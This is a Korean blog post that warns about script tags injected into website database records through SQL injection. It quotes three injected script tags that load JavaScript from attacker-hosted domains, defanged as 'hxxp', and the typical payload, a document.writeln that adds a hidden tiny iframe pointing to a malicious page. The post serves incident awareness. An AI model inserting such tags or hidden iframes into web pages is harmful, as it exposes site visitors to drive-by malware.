다음은, 최근에 일부 사이트(직간접으로 운영되는 서버에서...)에서 발생했던 Sql Injection 을 이용한 레코드에 스크립트 삽입이 되었던 스크립트 들입니다.. 보니깐,. 5월 5일 어린이날 전후인듯 싶습니다.
<script src="hxxp://winzipices.cn/3.js"></script>
구글링: http://www.google.co.kr/search?complete=1&hl=ko&newwindow=1&q=winzipices.cn%2F3.js&btnG=%EA%B2%80%EC%83%89&lr=lang_ko&aq=-1&oq=
<script src="hxxp://www.11910.net/1.js"></script>
구글링: http://www.google.co.kr/search?complete=1&hl=ko&newwindow=1&q=11910.net%2F1.js&btnG=%EA%B2%80%EC%83%89&lr=lang_ko&aq=f
<script src=hxxp://www.nmidahena.com/1.js></script>
구글링: http://www.google.co.kr/search?complete=1&hl=ko&newwindow=1&q=nmidahena.com%2F1.js&lr=lang_ko&aq=f
이건,. 검색건수가 10,900 건이네요..
대부분 유사한 파일명인 1.js 로 구글에서 검색하면, 104,000 여개가 검색됩니다.
구글링: http://www.google.co.kr/search?complete=1&hl=ko&newwindow=1&q=1.js&btnG=%EA%B2%80%EC%83%89&lr=lang_ko&aq=f
위 js 파일들 내부는 거의 대부분, 아래와 같은 형식을 취하고 있습니다.
document.writeln("<iframe width=\'10\' height=\'1\' src=\'hxxp:\/\/www.nmidahena.com\/1.htm\'><\/iframe>");
내용을 좀더 보실려면,. 저장하기 다운로드 받아서 텍스트 편집기로 열어보는 것도 좋겠습니다만,. 실행하면 안됩니다... -_-;;
가장 많이 본 글
-
Microsoft iSCSI Software Target 서비스가 네트워크 주소 10.0.1.152, 포트 3260에 바인딩하지 못했습니다. 작업에 실패했습니다. 오류 코드: 10049. 이 포트를 사용하고 있는 다른 응용 프로그램 없는지 확인하십시오.
-
■ 요약 Microsoft .NET Framework SDK(Software Development Kit)나 Visual Studio .NET을 설치한 후에 IIS(Internet Information Server) 매핑이 이루어져 ASP.NET ...
-
Windows 라이센스가 시스템 오류에 의해 복구되었습니다. 사용자의 Windows에 대한 정품 인증을 다시 받아야 합니다.
댓글 없음:
댓글 쓰기